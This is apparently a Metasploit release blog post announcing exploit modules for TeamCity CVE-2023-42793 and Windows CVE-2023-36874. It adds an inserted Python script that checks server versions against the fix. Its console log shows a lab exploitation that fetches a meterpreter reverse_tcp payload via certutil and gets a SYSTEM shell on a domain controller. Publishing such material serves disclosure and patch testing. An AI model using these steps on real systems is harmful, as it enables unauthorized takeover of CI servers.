Last updated at Mon, 22 Jan 2024 21:52:32 GMT

TeamCity authentication bypass and remote code execution

This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4 are vulnerable to this issue. The vulnerability was originally discovered by SonarSource, and the Metasploit module was developed by Rapid7’s Principal Security Researcher Stephen Fewer, who additionally published a technical analysis of CVE-2023-42793 on AttackerKB. A Rapid7 TeamCity customer advisory has also been released with details on mitigation guidance.

This exploit works against both Windows and Linux targets. Example usage:

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                   192.168.159.10   yes       The target host(s)
   RPORT                    8111             yes       The target port (TCP)
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   TEAMCITY_ADMIN_ID        1                yes       The ID of an administrator account to authenticate as
   TEAMCITY_CHANGE_TIMEOUT  30               yes       The timeout to wait for changes to be applied
   VHOST                                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.05.3 (build 129390) detected.
[*] Token already exists, deleting and generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*] Modifying internal.properties to allow process creation...
[*] Waiting for configuration change to be applied...
[*] Executing payload...
[*] Resetting internal.properties settings...
[*] Sending stage (200774 bytes) to 192.168.250.237
[*] Waiting for configuration change to be applied...
[*] Deleting authentication token.
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter >
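The module's automatic check above works by reading the version string TeamCity reports ("2023.05.3 (build 129390)") and comparing it with the first fixed release, 2023.05.4. The following helper, added here as an illustration and not code from the Metasploit module or from JetBrains, parses that banner format and applies the same "prior to 2023.05.4" rule offline, which is useful when auditing an inventory of servers without touching them. The host names and banners in the inventory are constructed sample data, not real systems.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# First fixed release named in the advisory text above: every earlier
# version is affected by CVE-2023-42793.
FIXED_VERSION: Tuple[int, int, int] = (2023, 5, 4)

# TeamCity reports versions as "YYYY.MM[.patch] (build NNNNNN)"; the build
# suffix is treated as optional because not every banner carries it.
_VERSION_RE = re.compile(
    r"^\s*(?P<year>\d{4})\.(?P<minor>\d{1,2})(?:\.(?P<patch>\d+))?"
    r"(?:\s*\(build\s+(?P<build>\d+)\))?\s*$"
)


class TeamCityVersion(NamedTuple):
    year: int
    minor: int
    patch: int
    build: Optional[int]


def parse_version(banner: str) -> TeamCityVersion:
    """Parse a TeamCity version banner; a missing patch level counts as 0."""
    m = _VERSION_RE.match(banner)
    if not m:
        raise ValueError(f"unrecognised TeamCity version string: {banner!r}")
    return TeamCityVersion(
        int(m["year"]),
        int(m["minor"]),
        int(m["patch"]) if m["patch"] else 0,
        int(m["build"]) if m["build"] else None,
    )


def is_vulnerable(banner: str) -> bool:
    """True when the reported version is strictly older than 2023.05.4."""
    v = parse_version(banner)
    # Compare year/minor/patch lexicographically; the build number is not
    # part of the comparison because the fix is keyed to the release number.
    return (v.year, v.minor, v.patch) < FIXED_VERSION


def audit(inventory: Dict[str, str]) -> Dict[str, Optional[bool]]:
    """Map host -> True (vulnerable), False (fixed) or None (unparseable banner).

    Unparseable banners are reported as None rather than silently treated as
    safe, so they show up for manual follow-up.
    """
    result: Dict[str, Optional[bool]] = {}
    for host, banner in inventory.items():
        try:
            result[host] = is_vulnerable(banner)
        except ValueError:
            result[host] = None
    return result


def vulnerable_hosts(inventory: Dict[str, str]) -> List[str]:
    """Convenience wrapper: sorted list of hosts that need patching."""
    return sorted(h for h, v in audit(inventory).items() if v is True)


# Constructed sample inventory (hypothetical hosts and banners).
SAMPLE_INVENTORY = {
    "ci-01.example.test": "2023.05.3 (build 129390)",  # matches the check output above
    "ci-02.example.test": "2023.05.4 (build 129421)",  # first fixed release
    "ci-03.example.test": "2022.10.2 (build 117025)",  # older branch, affected
    "ci-04.example.test": "2023.11",                  # newer than the fix
    "ci-05.example.test": "TeamCity Enterprise",      # no version exposed
}

if __name__ == "__main__":
    for host, status in audit(SAMPLE_INVENTORY).items():
        label = {True: "VULNERABLE", False: "fixed", None: "unknown"}[status]
        print(f"{host:22} {SAMPLE_INVENTORY[host]:28} {label}")
```

Running the script prints one line per host; only hosts with a parseable version older than 2023.05.4 are flagged, and a banner that carries no version is reported as unknown rather than assumed safe.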

New module content (2)

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18408 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2023_42793

Description: This adds an unauthenticated RCE for JetBrains' TeamCity server on both Linux and Windows. A remote attacker can exploit an authentication bypass vulnerability and then execute OS commands in the context of the service.

Microsoft Error Reporting Local Privilege Elevation Vulnerability

Authors: Filip Dragović (Wh04m1001), Octoberfest7, and bwatters-r7
Type: Exploit
Pull request: #18314 contributed by bwatters-r7
Path: windows/local/win_error_cve_2023_36874

Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 and enables an attacker to elevate privileges to those of the NT AUTHORITY\SYSTEM user. Note that this module works with Windows 10 x64 22H2.

Enhancements and features (1)

  • #18399 from h00die - Fixes multiple spelling mistakes in module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).